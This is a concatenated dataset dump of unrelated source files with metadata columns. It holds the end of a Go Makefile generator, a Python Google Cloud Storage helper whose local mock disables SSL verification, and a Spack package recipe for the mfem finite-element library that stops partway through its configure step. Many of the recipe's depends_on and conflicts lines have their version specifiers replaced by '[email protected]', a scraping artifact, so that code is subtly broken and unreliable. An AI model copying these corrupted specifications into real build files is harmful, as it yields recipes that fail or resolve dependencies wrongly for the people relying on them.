all: get_tools get_vendor_deps build test
get_tools:
go get github.com/golang/dep/cmd/dep
build:
go build -o bin/basecli cmd/basecli/main.go && go build -o bin/basecoind cmd/basecoind/main.go
get_vendor_deps:
@rm -rf vendor/
@dep ensure
test:
@go test $(PACKAGES)
benchmark:
@go test -bench=. $(PACKAGES)
.PHONY: all build test benchmark`
// Replacing instances of base* to project specific names
makefileContents = replacer.Replace(makefileContents)
ioutil.WriteFile(projectPath+"/Makefile", []byte(makefileContents), os.ModePerm)
}
func setupBasecoinWorkspace(projectName string, remoteProjectPath string) error {
projectPath := resolveProjectPath(remoteProjectPath)
fmt.Println("Configuring your project in " + projectPath)
// Check if the projectPath already exists or not
if _, err := os.Stat(projectPath); !os.IsNotExist(err) {
return fmt.Errorf("Unable to initialize the project. %s already exists", projectPath)
}
copyBasecoinTemplate(projectName, projectPath, remoteProjectPath)
createGopkg(projectPath)
createMakefile(projectPath)
fmt.Printf("Initialized a new project at %s.\nHappy hacking!\n", projectPath)
return nil
}
| [
"\"GOPATH\""
]
| []
| [
"GOPATH"
]
| [] | ["GOPATH"] | go | 1 | 0 | |
api/app/utils/storage.py | """Utilities for interaction with Google Cloud Storage, and a mock version of it for loal development."""
from google.cloud import storage
from google.oauth2 import service_account
from google.auth.credentials import AnonymousCredentials
from google.api_core.client_options import ClientOptions
from config import GCP_CREDENTIALS_DICT, GCP_PROJECT_NAME, GCP_BUCKET_NAME
import requests
import urllib3
import os
from app import LOGGER
def _create_dummy_storage_client():
fake_host = os.getenv('STORAGE_PORT_4443_TCP_ADDR')
external_url = 'https://{}:4443'.format(fake_host)
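    # Point google-cloud-storage's module-level URL templates at the local fake GCS server
    # so blob uploads and downloads target it instead of storage.googleapis.com.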
storage.blob._API_ACCESS_ENDPOINT = 'https://storage.gcs.{}.nip.io:4443'.format(fake_host)
storage.blob._DOWNLOAD_URL_TEMPLATE = (
u"%s/download/storage/v1{path}?alt=media" % external_url
)
storage.blob._BASE_UPLOAD_TEMPLATE = (
u"%s/upload/storage/v1{bucket_path}/o?uploadType=" % external_url
)
storage.blob._MULTIPART_URL_TEMPLATE = storage.blob._BASE_UPLOAD_TEMPLATE + u"multipart"
storage.blob._RESUMABLE_URL_TEMPLATE = storage.blob._BASE_UPLOAD_TEMPLATE + u"resumable"
my_http = requests.Session()
my_http.verify = False # disable SSL validation
urllib3.disable_warnings(
urllib3.exceptions.InsecureRequestWarning
) # disable https warnings for https insecure certs
storage_client = storage.Client(
credentials=AnonymousCredentials(),
project='test',
_http=my_http,
client_options=ClientOptions(api_endpoint=external_url))
if len(list(storage_client.list_buckets())) == 0:
bucket = storage_client.create_bucket(_get_bucket_name())
return storage_client
def _create_real_storage_client():
if GCP_CREDENTIALS_DICT['private_key'] == 'dummy':
# Running on GCP, so no credentials needed
storage_client = storage.Client(project=GCP_PROJECT_NAME)
else:
# Create credentials to access from anywhere
credentials = service_account.Credentials.from_service_account_info(
GCP_CREDENTIALS_DICT
)
storage_client = storage.Client(credentials=credentials, project=GCP_PROJECT_NAME)
return storage_client
def _get_bucket_name():
return 'LocalBucket' if GCP_BUCKET_NAME == '__filler__' else GCP_BUCKET_NAME
def _get_storage_bucket(storage_client):
return storage_client.get_bucket(_get_bucket_name())
def get_storage_bucket():
if GCP_CREDENTIALS_DICT['private_key'] == '__filler__':
LOGGER.debug('Setting dummy storage client')
storage_client = _create_dummy_storage_client()
else:
LOGGER.debug('Setting GCP storage client')
storage_client = _create_real_storage_client()
return _get_storage_bucket(storage_client)
| []
| []
| [
"STORAGE_PORT_4443_TCP_ADDR"
]
| [] | ["STORAGE_PORT_4443_TCP_ADDR"] | python | 1 | 0 | |
scripts/spack/packages/mfem/package.py | # Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import os
import shutil
import sys
from spack import *
class Mfem(Package, CudaPackage, ROCmPackage):
"""Free, lightweight, scalable C++ library for finite element methods."""
tags = ['fem', 'finite-elements', 'high-order', 'amr', 'hpc', 'radiuss', 'e4s']
homepage = 'http://www.mfem.org'
git = 'https://github.com/mfem/mfem.git'
maintainers = ['v-dobrev', 'tzanio', 'acfisher',
'goxberry', 'markcmiller86']
test_requires_compiler = True
# Recommended mfem builds to test when updating this file: see the shell
# script 'test_builds.sh' in the same directory as this file.
# mfem is downloaded from a URL shortener at request of upstream
# author Tzanio Kolev <[email protected]>. See here:
# https://github.com/mfem/mfem/issues/53
#
# The following procedure should be used to verify security when a
# new version is added:
#
# 1. Verify that no checksums on old versions have changed.
#
# 2. Verify that the shortened URL for the new version is listed at:
# https://mfem.org/download/
#
# 3. Use http://getlinkinfo.com or similar to verify that the
# underling download link for the latest version comes has the
    #    underlying download link for the latest version has the
#
# If this quick verification procedure fails, additional discussion
# will be required to verify the new version.
# 'develop' is a special version that is always larger (or newer) than any
# other version.
version('develop', branch='master')
# SERAC EDIT BEGIN
# Note: we have a `serac-dev` branch on mfem's github that we track pending changes.
# Make sure this sha coincides with the git submodule
version('4.3.0serac', commit='e55e90e8d0e331bba3fbe20a98a9f9b12453700b', submodules="True")
# SERAC EDIT END
version('4.3.0',
sha256='3a495602121b986049286ea0b23512279cdbdfb43c15c42a1511b521051fbe38',
url='https://bit.ly/mfem-4-3', extension='tar.gz')
version('4.2.0',
'4352a225b55948d2e73a5ee88cece0e88bdbe7ba6726a23d68b2736d3221a86d',
url='https://bit.ly/mfem-4-2', extension='tar.gz')
version('4.1.0',
'4c83fdcf083f8e2f5b37200a755db843cdb858811e25a8486ad36b2cbec0e11d',
url='https://bit.ly/mfem-4-1', extension='tar.gz')
# Tagged development version used by xSDK
version('4.0.1-xsdk', commit='c55c80d17b82d80de04b849dd526e17044f8c99a')
version('4.0.0',
'df5bdac798ea84a263979f6fbf79de9013e1c55562f95f98644c3edcacfbc727',
url='https://bit.ly/mfem-4-0', extension='tar.gz')
# Tagged development version used by the laghos package:
version('3.4.1-laghos-v2.0', tag='laghos-v2.0')
version('3.4.0',
sha256='4e73e4fe0482636de3c5dc983cd395839a83cb16f6f509bd88b053e8b3858e05',
url='https://bit.ly/mfem-3-4', extension='tar.gz')
version('3.3.2',
sha256='b70fa3c5080b9ec514fc05f4a04ff74322b99ac4ecd6d99c229f0ed5188fc0ce',
url='https://goo.gl/Kd7Jk8', extension='tar.gz')
# Tagged development version used by the laghos package:
version('3.3.1-laghos-v1.0', tag='laghos-v1.0')
version('3.3',
sha256='b17bd452593aada93dc0fee748fcfbbf4f04ce3e7d77fdd0341cc9103bcacd0b',
url='http://goo.gl/Vrpsns', extension='tar.gz')
version('3.2',
sha256='2938c3deed4ec4f7fd5b5f5cfe656845282e86e2dcd477d292390058b7b94340',
url='http://goo.gl/Y9T75B', extension='tar.gz')
version('3.1',
sha256='841ea5cf58de6fae4de0f553b0e01ebaab9cd9c67fa821e8a715666ecf18fc57',
url='http://goo.gl/xrScXn', extension='tar.gz')
variant('static', default=True,
description='Build static library')
variant('shared', default=False,
description='Build shared library')
variant('mpi', default=True,
description='Enable MPI parallelism')
# Can we make the default value for 'metis' to depend on the 'mpi' value?
variant('metis', default=True,
description='Enable METIS support')
variant('openmp', default=False,
description='Enable OpenMP parallelism')
# Note: '+cuda' and 'cuda_arch' variants are added by the CudaPackage
# Note: '+rocm' and 'amdgpu_target' variants are added by the ROCmPackage
variant('occa', default=False, description='Enable OCCA backend')
variant('raja', default=False, description='Enable RAJA backend')
variant('libceed', default=False, description='Enable libCEED backend')
variant('umpire', default=False, description='Enable Umpire support')
variant('amgx', default=False, description='Enable NVIDIA AmgX solver support')
variant('threadsafe', default=False,
description=('Enable thread safe features.'
' Required for OpenMP.'
' May cause minor performance issues.'))
variant('superlu-dist', default=False,
description='Enable MPI parallel, sparse direct solvers')
variant('strumpack', default=False,
description='Enable support for STRUMPACK')
variant('suite-sparse', default=False,
description='Enable serial, sparse direct solvers')
variant('petsc', default=False,
description='Enable PETSc solvers, preconditioners, etc.')
variant('slepc', default=False,
description='Enable SLEPc integration')
variant('sundials', default=False,
description='Enable Sundials time integrators')
variant('pumi', default=False,
description='Enable functionality based on PUMI')
variant('gslib', default=False,
description='Enable functionality based on GSLIB')
variant('mpfr', default=False,
description='Enable precise, 1D quadrature rules')
variant('lapack', default=False,
description='Use external blas/lapack routines')
variant('debug', default=False,
description='Build debug instead of optimized version')
variant('netcdf', default=False,
description='Enable Cubit/Genesis reader')
variant('conduit', default=False,
description='Enable binary data I/O using Conduit')
variant('zlib', default=True,
description='Support zip\'d streams for I/O')
variant('gnutls', default=False,
description='Enable secure sockets using GnuTLS')
variant('libunwind', default=False,
description='Enable backtrace on error support using Libunwind')
# TODO: SIMD, Ginkgo, ADIOS2, HiOp, MKL CPardiso, Axom/Sidre
variant('timer', default='auto',
values=('auto', 'std', 'posix', 'mac', 'mpi'),
description='Timing functions to use in mfem::StopWatch')
variant('examples', default=False,
description='Build and install examples')
variant('miniapps', default=False,
description='Build and install miniapps')
conflicts('+shared', when='@:3.3.2')
conflicts('~static~shared')
conflicts('~threadsafe', when='@:3+openmp')
conflicts('+cuda', when='@:3')
conflicts('+rocm', when='@:4.1')
conflicts('+cuda+rocm')
conflicts('+netcdf', when='@:3.1')
conflicts('+superlu-dist', when='@:3.1')
# STRUMPACK support was added in mfem v3.3.2, however, here we allow only
# strumpack v3+ support for which is available starting with mfem v4.0:
conflicts('+strumpack', when='@:3')
conflicts('+gnutls', when='@:3.1')
conflicts('+zlib', when='@:3.2')
conflicts('+mpfr', when='@:3.2')
conflicts('+petsc', when='@:3.2')
conflicts('+slepc', when='@:4.1')
conflicts('+sundials', when='@:3.2')
conflicts('+pumi', when='@:3.3.2')
conflicts('+gslib', when='@:4.0')
conflicts('timer=mac', when='@:3.3.0')
conflicts('timer=mpi', when='@:3.3.0')
conflicts('~metis+mpi', when='@:3.3.0')
conflicts('+metis~mpi', when='@:3.3.0')
conflicts('+conduit', when='@:3.3.2')
conflicts('+occa', when='mfem@:3')
conflicts('+raja', when='mfem@:3')
conflicts('+libceed', when='mfem@:4.0')
conflicts('+umpire', when='mfem@:4.0')
conflicts('+amgx', when='mfem@:4.1')
conflicts('+amgx', when='~cuda')
conflicts('+mpi~cuda ^hypre+cuda')
conflicts('+superlu-dist', when='~mpi')
conflicts('+strumpack', when='~mpi')
conflicts('+petsc', when='~mpi')
conflicts('+slepc', when='~petsc')
conflicts('+pumi', when='~mpi')
conflicts('timer=mpi', when='~mpi')
depends_on('mpi', when='+mpi')
    depends_on('[email protected]:2.13', when='@:3.3+mpi')
depends_on('hypre@:2.20.0', when='@3.4:4.2+mpi')
depends_on('hypre@:2.23.0', when='@4.3.0+mpi')
depends_on('hypre', when='+mpi')
depends_on('metis', when='+metis')
depends_on('blas', when='+lapack')
    depends_on('[email protected]:', when='+lapack')
    depends_on('[email protected]', when='@:3.3.0+sundials~mpi')
    depends_on('[email protected]+mpi+hypre', when='@:3.3.0+sundials+mpi')
    depends_on('[email protected]:', when='@3.3.2:+sundials~mpi')
    depends_on('[email protected]:+mpi+hypre', when='@3.3.2:+sundials+mpi')
    depends_on('[email protected]:', when='@4.0.1-xsdk:+sundials~mpi')
    depends_on('[email protected]:+mpi+hypre', when='@4.0.1-xsdk:+sundials+mpi')
for sm_ in CudaPackage.cuda_arch_values:
        depends_on('[email protected]:+cuda cuda_arch={0}'.format(sm_),
when='@4.2.0:+sundials+cuda cuda_arch={0}'.format(sm_))
    depends_on('[email protected]:', when='@4.2.0:+pumi')
depends_on('pumi', when='+pumi~shared')
depends_on('pumi+shared', when='+pumi+shared')
    depends_on('[email protected]:+mpi', when='+gslib+mpi')
    depends_on('[email protected]:~mpi~mpiio', when='+gslib~mpi')
depends_on('suite-sparse', when='+suite-sparse')
depends_on('superlu-dist', when='+superlu-dist')
    depends_on('[email protected]:', when='+strumpack~shared')
    depends_on('[email protected]:+shared', when='+strumpack+shared')
for sm_ in CudaPackage.cuda_arch_values:
depends_on('strumpack+cuda cuda_arch={0}'.format(sm_),
when='+strumpack+cuda cuda_arch={0}'.format(sm_))
# The PETSc tests in MFEM will fail if PETSc is not configured with
# SuiteSparse and MUMPS. On the other hand, if we require the variants
# '+suite-sparse+mumps' of PETSc, the xsdk package concretization fails.
    depends_on('[email protected]:+mpi+double+hypre', when='+petsc')
    depends_on('[email protected]:', when='+slepc')
# Recommended when building outside of xsdk:
    # depends_on('[email protected]:+mpi+double+hypre+suite-sparse+mumps',
# when='+petsc')
depends_on('mpfr', when='+mpfr')
    depends_on('[email protected]:', when='+netcdf')
depends_on('unwind', when='+libunwind')
depends_on('zlib', when='+zlib')
depends_on('gnutls', when='+gnutls')
    depends_on('[email protected]:,master:', when='+conduit')
depends_on('conduit+mpi', when='+conduit+mpi')
    # The MFEM 4.0.0 SuperLU interface fails when using newer petsc and
    # superlu-dist releases (see the conflict below and
    # https://github.com/mfem/mfem/issues/983).
# This issue was resolved in v4.1.
conflicts('+superlu-dist',
              when='mfem@:4.0 ^[email protected]: ^superlu-dist@6:')
# The STRUMPACK v3 interface in MFEM seems to be broken as of MFEM v4.1
# when using hypre version >= 2.16.0.
# This issue is resolved in v4.2.
    conflicts('+strumpack', when='[email protected]:4.1 ^[email protected]:')
conflicts('+strumpack ^strumpack+cuda', when='~cuda')
    depends_on('[email protected]:', when='@:4.1+occa')
    depends_on('[email protected]:', when='@4.2.0:+occa')
depends_on('occa+cuda', when='+occa+cuda')
# TODO: propagate '+rocm' variant to occa when it is supported
    depends_on('[email protected]:', when='@4.0.1:+raja')
    depends_on('[email protected]:0.9.0', when='@4.0.0+raja')
for sm_ in CudaPackage.cuda_arch_values:
depends_on('raja+cuda cuda_arch={0}'.format(sm_),
when='+raja+cuda cuda_arch={0}'.format(sm_))
for gfx in ROCmPackage.amdgpu_targets:
depends_on('raja+rocm amdgpu_target={0}'.format(gfx),
when='+raja+rocm amdgpu_target={0}'.format(gfx))
    depends_on('[email protected]:', when='@:4.1+libceed')
    depends_on('[email protected]:', when='@4.2.0:+libceed')
for sm_ in CudaPackage.cuda_arch_values:
depends_on('libceed+cuda cuda_arch={0}'.format(sm_),
when='+libceed+cuda cuda_arch={0}'.format(sm_))
for gfx in ROCmPackage.amdgpu_targets:
depends_on('libceed+rocm amdgpu_target={0}'.format(gfx),
when='+libceed+rocm amdgpu_target={0}'.format(gfx))
    depends_on('[email protected]:', when='+umpire')
for sm_ in CudaPackage.cuda_arch_values:
depends_on('umpire+cuda cuda_arch={0}'.format(sm_),
when='+umpire+cuda cuda_arch={0}'.format(sm_))
for gfx in ROCmPackage.amdgpu_targets:
depends_on('umpire+rocm amdgpu_target={0}'.format(gfx),
when='+umpire+rocm amdgpu_target={0}'.format(gfx))
# AmgX: propagate the cuda_arch and mpi settings:
for sm_ in CudaPackage.cuda_arch_values:
depends_on('amgx+mpi cuda_arch={0}'.format(sm_),
when='+amgx+mpi cuda_arch={0}'.format(sm_))
depends_on('amgx~mpi cuda_arch={0}'.format(sm_),
when='+amgx~mpi cuda_arch={0}'.format(sm_))
patch('mfem_ppc_build.patch', when='@3.2:3.3.0 arch=ppc64le')
patch('mfem-3.4.patch', when='@3.4.0')
patch('mfem-3.3-3.4-petsc-3.9.patch',
          when='@3.3.0:3.4.0 +petsc ^[email protected]:')
patch('mfem-4.2-umpire.patch', when='@4.2.0+umpire')
patch('mfem-4.2-slepc.patch', when='@4.2.0+slepc')
    patch('mfem-4.2-petsc-3.15.0.patch', when='@4.2.0+petsc ^[email protected]:')
# SERAC EDIT BEGIN
# Our version of mfem has these patches already
#patch('mfem-4.3-hypre-2.23.0.patch', when='@4.3.0')
#patch('mfem-4.3-cusparse-11.4.patch', when='@4.3.0+cuda')
# SERAC EDIT END
# Patch to fix MFEM makefile syntax error. See
# https://github.com/mfem/mfem/issues/1042 for the bug report and
# https://github.com/mfem/mfem/pull/1043 for the bugfix contributed
# upstream.
patch('mfem-4.0.0-makefile-syntax-fix.patch', when='@4.0.0')
phases = ['configure', 'build', 'install']
def setup_build_environment(self, env):
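        # Clear any externally set MFEM locations so they cannot leak into this build.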
env.unset('MFEM_DIR')
env.unset('MFEM_BUILD_DIR')
#
# Note: Although MFEM does support CMake configuration, MFEM
# development team indicates that vanilla GNU Make is the
# preferred mode of configuration of MFEM and the mode most
# likely to be up to date in supporting *all* of MFEM's
# configuration options. So, don't use CMake
#
def configure(self, spec, prefix):
def yes_no(varstr):
return 'YES' if varstr in self.spec else 'NO'
# See also find_system_libraries in lib/spack/llnl/util/filesystem.py
# where the same list of paths is used.
sys_lib_paths = [
'/lib64',
'/lib',
'/usr/lib64',
'/usr/lib',
'/usr/local/lib64',
'/usr/local/lib']
def is_sys_lib_path(dir):
return dir in sys_lib_paths
xcompiler = ''
xlinker = '-Wl,'
if '+cuda' in spec:
xcompiler = '-Xcompiler='
# SERAC EDIT BEGIN - Xlinker fix 1/3 - better way? upstream?
xlinker = '-Xlinker '
# SERAC EDIT END
cuda_arch = None if '~cuda' in spec else spec.variants['cuda_arch'].value
# We need to add rpaths explicitly to allow proper export of link flags
# from within MFEM.
# Similar to spec[pkg].libs.ld_flags but prepends rpath flags too.
# Also does not add system library paths as defined by 'sys_lib_paths'
# above -- this is done to avoid issues like this:
# https://github.com/mfem/mfem/issues/1088.
def ld_flags_from_library_list(libs_list):
# SERAC EDIT BEGIN - Xlinker fix 2/3
flags = ['%s-rpath %s%s' % (xlinker, xlinker, dir)
for dir in libs_list.directories
if not is_sys_lib_path(dir)]
# SERAC EDIT END
flags += ['-L%s' % dir for dir in libs_list.directories
if not is_sys_lib_path(dir)]
flags += [libs_list.link_flags]
return ' '.join(flags)
def ld_flags_from_dirs(pkg_dirs_list, pkg_libs_list):
# SERAC EDIT BEGIN - Xlinker fix 3/3
flags = ['%s-rpath %s%s' % (xlinker, xlinker, dir) for dir in pkg_dirs_list
if not is_sys_lib_path(dir)]
# SERAC EDIT END
flags += ['-L%s' % dir for dir in pkg_dirs_list
if not is_sys_lib_path(dir)]
flags += ['-l%s' % lib for lib in pkg_libs_list]
return ' '.join(flags)
def find_optional_library(name, prefix):
for shared in [True, False]:
for path in ['lib64', 'lib']:
lib = find_libraries(name, join_path(prefix, path),
shared=shared, recursive=False)
if lib:
return lib
return LibraryList([])
# Determine how to run MPI tests, e.g. when using '--test=root', when
# Spack is run inside a batch system job.
mfem_mpiexec = 'mpirun'
mfem_mpiexec_np = '-np'
if 'SLURM_JOBID' in os.environ:
mfem_mpiexec = 'srun'
mfem_mpiexec_np = '-n'
elif 'LSB_JOBID' in os.environ:
if 'LLNL_COMPUTE_NODES' in os.environ:
mfem_mpiexec = 'lrun'
mfem_mpiexec_np = '-n'
else:
mfem_mpiexec = 'jsrun'
mfem_mpiexec_np = '-p'
metis5_str = 'NO'
if ('+metis' in spec) and spec['metis'].satisfies('@5:'):
metis5_str = 'YES'
zlib_var = 'MFEM_USE_ZLIB' if (spec.satisfies('@4.1.0:')) else \
'MFEM_USE_GZSTREAM'
options = [
'PREFIX=%s' % prefix,
'MFEM_USE_MEMALLOC=YES',
'MFEM_DEBUG=%s' % yes_no('+debug'),
# NOTE: env['CXX'] is the spack c++ compiler wrapper. The real
# compiler is defined by env['SPACK_CXX'].
'CXX=%s' % env['CXX'],
'MFEM_USE_LIBUNWIND=%s' % yes_no('+libunwind'),
'%s=%s' % (zlib_var, yes_no('+zlib')),
'MFEM_USE_METIS=%s' % yes_no('+metis'),
'MFEM_USE_METIS_5=%s' % metis5_str,
'MFEM_THREAD_SAFE=%s' % yes_no('+threadsafe'),
'MFEM_USE_MPI=%s' % yes_no('+mpi'),
'MFEM_USE_LAPACK=%s' % yes_no('+lapack'),
'MFEM_USE_SUPERLU=%s' % yes_no('+superlu-dist'),
'MFEM_USE_STRUMPACK=%s' % yes_no('+strumpack'),
'MFEM_USE_SUITESPARSE=%s' % yes_no('+suite-sparse'),
'MFEM_USE_SUNDIALS=%s' % yes_no('+sundials'),
'MFEM_USE_PETSC=%s' % yes_no('+petsc'),
'MFEM_USE_SLEPC=%s' % yes_no('+slepc'),
'MFEM_USE_PUMI=%s' % yes_no('+pumi'),
'MFEM_USE_GSLIB=%s' % yes_no('+gslib'),
'MFEM_USE_NETCDF=%s' % yes_no('+netcdf'),
'MFEM_USE_MPFR=%s' % yes_no('+mpfr'),
'MFEM_USE_GNUTLS=%s' % yes_no('+gnutls'),
'MFEM_USE_OPENMP=%s' % yes_no('+openmp'),
'MFEM_USE_CONDUIT=%s' % yes_no('+conduit'),
'MFEM_USE_CUDA=%s' % yes_no('+cuda'),
'MFEM_USE_HIP=%s' % yes_no('+rocm'),
'MFEM_USE_OCCA=%s' % yes_no('+occa'),
'MFEM_USE_RAJA=%s' % yes_no('+raja'),
'MFEM_USE_AMGX=%s' % yes_no('+amgx'),
'MFEM_USE_CEED=%s' % yes_no('+libceed'),
'MFEM_USE_UMPIRE=%s' % yes_no('+umpire'),
'MFEM_MPIEXEC=%s' % mfem_mpiexec,
'MFEM_MPIEXEC_NP=%s' % mfem_mpiexec_np]
cxxflags = spec.compiler_flags['cxxflags']
if cxxflags:
# Add opt/debug flags if they are not present in global cxx flags
opt_flag_found = any(f in self.compiler.opt_flags
for f in cxxflags)
debug_flag_found = any(f in self.compiler.debug_flags
for f in cxxflags)
if '+debug' in spec:
if not debug_flag_found:
cxxflags.append('-g')
if not opt_flag_found:
cxxflags.append('-O0')
else:
if not opt_flag_found:
cxxflags.append('-O2')
cxxflags = [(xcompiler + flag) for flag in cxxflags]
if '+cuda' in spec:
cxxflags += [
'-x=cu --expt-extended-lambda -arch=sm_%s' % cuda_arch,
'-ccbin %s' % (spec['mpi'].mpicxx if '+mpi' in spec
else env['CXX'])]
if self.spec.satisfies('@4.0.0:'):
cxxflags.append(self.compiler.cxx11_flag)
# The cxxflags are set by the spack c++ compiler wrapper. We also
# set CXXFLAGS explicitly, for clarity, and to properly export the
# cxxflags in the variable MFEM_CXXFLAGS in config.mk.
options += ['CXXFLAGS=%s' % ' '.join(cxxflags)]
if '~static' in spec:
options += ['STATIC=NO']
if '+shared' in spec:
options += [
'SHARED=YES',
'PICFLAG=%s' % (xcompiler + self.compiler.cxx_pic_flag)]
if '+mpi' in spec:
options += ['MPICXX=%s' % spec['mpi'].mpicxx]
hypre = spec['hypre']
# The hypre package always links with 'blas' and 'lapack'.
all_hypre_libs = hypre.libs + hypre['lapack'].libs + \
hypre['blas'].libs
options += [
'HYPRE_OPT=-I%s' % hypre.prefix.include,
'HYPRE_LIB=%s' % ld_flags_from_library_list(all_hypre_libs)]
if '+metis' in spec:
options += [
'METIS_OPT=-I%s' % spec['metis'].prefix.include,
'METIS_LIB=%s' %
ld_flags_from_library_list(spec['metis'].libs)]
if '+lapack' in spec:
lapack_blas = spec['lapack'].libs + spec['blas'].libs
options += [
# LAPACK_OPT is not used
'LAPACK_LIB=%s' % ld_flags_from_library_list(lapack_blas)]
if '+superlu-dist' in spec:
lapack_blas = spec['lapack'].libs + spec['blas'].libs
options += [
'SUPERLU_OPT=-I%s -I%s' %
(spec['superlu-dist'].prefix.include,
spec['parmetis'].prefix.include),
'SUPERLU_LIB=%s %s' %
(ld_flags_from_dirs([spec['superlu-dist'].prefix.lib,
spec['parmetis'].prefix.lib],
['superlu_dist', 'parmetis']),
ld_flags_from_library_list(lapack_blas))]
if '+strumpack' in spec:
strumpack = spec['strumpack']
sp_opt = ['-I%s' % strumpack.prefix.include]
sp_lib = [ld_flags_from_library_list(strumpack.libs)]
# Parts of STRUMPACK use fortran, so we need to link with the
# fortran library and also the MPI fortran library:
if '~shared' in strumpack:
if os.path.basename(env['FC']) == 'gfortran':
gfortran = Executable(env['FC'])
libext = 'dylib' if sys.platform == 'darwin' else 'so'
libfile = os.path.abspath(gfortran(
'-print-file-name=libgfortran.%s' % libext,
output=str).strip())
gfortran_lib = LibraryList(libfile)
sp_lib += [ld_flags_from_library_list(gfortran_lib)]
if ('^mpich' in strumpack) or ('^mvapich2' in strumpack):
sp_lib += ['-lmpifort']
elif '^openmpi' in strumpack:
sp_lib += ['-lmpi_mpifh']
elif '^spectrum-mpi' in strumpack:
sp_lib += ['-lmpi_ibm_mpifh']
if '+openmp' in strumpack:
# The '+openmp' in the spec means strumpack will TRY to find
# OpenMP; if not found, we should not add any flags -- how do
# we figure out if strumpack found OpenMP?
if not self.spec.satisfies('%apple-clang'):
sp_opt += [xcompiler + self.compiler.openmp_flag]
if '^parmetis' in strumpack:
parmetis = strumpack['parmetis']
sp_opt += [parmetis.headers.cpp_flags]
sp_lib += [ld_flags_from_library_list(parmetis.libs)]
if '^netlib-scalapack' in strumpack:
scalapack = strumpack['scalapack']
sp_opt += ['-I%s' % scalapack.prefix.include]
sp_lib += [ld_flags_from_dirs([scalapack.prefix.lib],
['scalapack'])]
elif '^scalapack' in strumpack:
scalapack = strumpack['scalapack']
sp_opt += [scalapack.headers.cpp_flags]
sp_lib += [ld_flags_from_library_list(scalapack.libs)]
if '+butterflypack' in strumpack:
bp = strumpack['butterflypack']
sp_opt += ['-I%s' % bp.prefix.include]
sp_lib += [ld_flags_from_dirs([bp.prefix.lib],
['dbutterflypack',
'zbutterflypack'])]
if '+zfp' in strumpack:
zfp = strumpack['zfp']
sp_opt += ['-I%s' % zfp.prefix.include]
sp_lib += [ld_flags_from_dirs([zfp.prefix.lib], ['zfp'])]
if '+cuda' in strumpack:
# assuming also ('+cuda' in spec)
sp_lib += ['-lcusolver', '-lcublas']
options += [
'STRUMPACK_OPT=%s' % ' '.join(sp_opt),
'STRUMPACK_LIB=%s' % ' '.join(sp_lib)]
if '+suite-sparse' in spec:
ss_spec = 'suite-sparse:' + self.suitesparse_components
options += [
'SUITESPARSE_OPT=-I%s' % spec[ss_spec].prefix.include,
'SUITESPARSE_LIB=%s' %
ld_flags_from_library_list(spec[ss_spec].libs)]
if '+sundials' in spec:
sun_spec = 'sundials:' + self.sundials_components
options += [
'SUNDIALS_OPT=%s' % spec[sun_spec].headers.cpp_flags,
'SUNDIALS_LIB=%s' %
ld_flags_from_library_list(spec[sun_spec].libs)]
if '+petsc' in spec:
petsc = spec['petsc']
if '+shared' in petsc:
options += [
'PETSC_OPT=%s' % petsc.headers.cpp_flags,
'PETSC_LIB=%s' % ld_flags_from_library_list(petsc.libs)]
else:
options += ['PETSC_DIR=%s' % petsc.prefix]
if '+slepc' in spec:
slepc = spec['slepc']
options += [
'SLEPC_OPT=%s' % slepc.headers.cpp_flags,
'SLEPC_LIB=%s' % ld_flags_from_library_list(slepc.libs)]
if '+pumi' in spec:
pumi_libs = ['pumi', 'crv', 'ma', 'mds', 'apf', 'pcu', 'gmi',
'parma', 'lion', 'mth', 'apf_zoltan', 'spr']
options += [
'PUMI_OPT=-I%s' % spec['pumi'].prefix.include,
'PUMI_LIB=%s' %
ld_flags_from_dirs([spec['pumi'].prefix.lib], pumi_libs)]
if '+gslib' in spec:
options += [
'GSLIB_OPT=-I%s' % spec['gslib'].prefix.include,
'GSLIB_LIB=%s' %
ld_flags_from_dirs([spec['gslib'].prefix.lib], ['gs'])]
if '+netcdf' in spec:
lib_flags = ld_flags_from_dirs([spec['netcdf-c'].prefix.lib],
['netcdf'])
hdf5 = spec['hdf5:hl']
if hdf5.satisfies('~shared'):
hdf5_libs = hdf5.libs
hdf5_libs += LibraryList(find_system_libraries('libdl'))
lib_flags += " " + ld_flags_from_library_list(hdf5_libs)
options += [
'NETCDF_OPT=-I%s' % spec['netcdf-c'].prefix.include,
'NETCDF_LIB=%s' % lib_flags]
if '+zlib' in spec:
if "@:3.3.2" in spec:
options += ['ZLIB_DIR=%s' % spec['zlib'].prefix]
else:
options += [
'ZLIB_OPT=-I%s' % spec['zlib'].prefix.include,
'ZLIB_LIB=%s' %
ld_flags_from_library_list(spec['zlib'].libs)]
if '+mpfr' in spec:
options += [
'MPFR_OPT=-I%s' % spec['mpfr'].prefix.include,
'MPFR_LIB=%s' %
ld_flags_from_dirs([spec['mpfr'].prefix.lib], ['mpfr'])]
if '+gnutls' in spec:
options += [
'GNUTLS_OPT=-I%s' % spec['gnutls'].prefix.include,
'GNUTLS_LIB=%s' %
ld_flags_from_dirs([spec['gnutls'].prefix.lib], ['gnutls'])]
if '+libunwind' in spec:
libunwind = spec['unwind']
headers = find_headers('libunwind', libunwind.prefix.include)
headers.add_macro('-g')
libs = find_optional_library('libunwind', libunwind.prefix)
# When mfem uses libunwind, it also needs 'libdl'.
libs += LibraryList(find_system_libraries('libdl'))
options += [
'LIBUNWIND_OPT=%s' % headers.cpp_flags,
'LIBUNWIND_LIB=%s' % ld_flags_from_library_list(libs)]
if '+openmp' in spec:
options += [
'OPENMP_OPT=%s' % (xcompiler + self.compiler.openmp_flag)]
if '+cuda' in spec:
options += [
'CUDA_CXX=%s' % join_path(spec['cuda'].prefix, 'bin', 'nvcc'),
'CUDA_ARCH=sm_%s' % cuda_arch]
if '+rocm' in spec:
amdgpu_target = ','.join(spec.variants['amdgpu_target'].value)
options += [
'HIP_CXX=%s' % spec['hip'].hipcc,
'HIP_ARCH=%s' % amdgpu_target]
if '+occa' in spec:
options += ['OCCA_OPT=-I%s' % spec['occa'].prefix.include,
'OCCA_LIB=%s' %
ld_flags_from_dirs([spec['occa'].prefix.lib],
['occa'])]
if '+raja' in spec:
options += ['RAJA_OPT=-I%s' % spec['raja'].prefix.include,
'RAJA_LIB=%s' %
ld_flags_from_dirs([spec['raja'].prefix.lib],
['RAJA'])]
if '+amgx' in spec:
amgx = spec['amgx']
if '+shared' in amgx:
options += ['AMGX_OPT=-I%s' % amgx.prefix.include,
'AMGX_LIB=%s' %
ld_flags_from_library_list(amgx.libs)]
else:
options += ['AMGX_DIR=%s' % amgx.prefix]
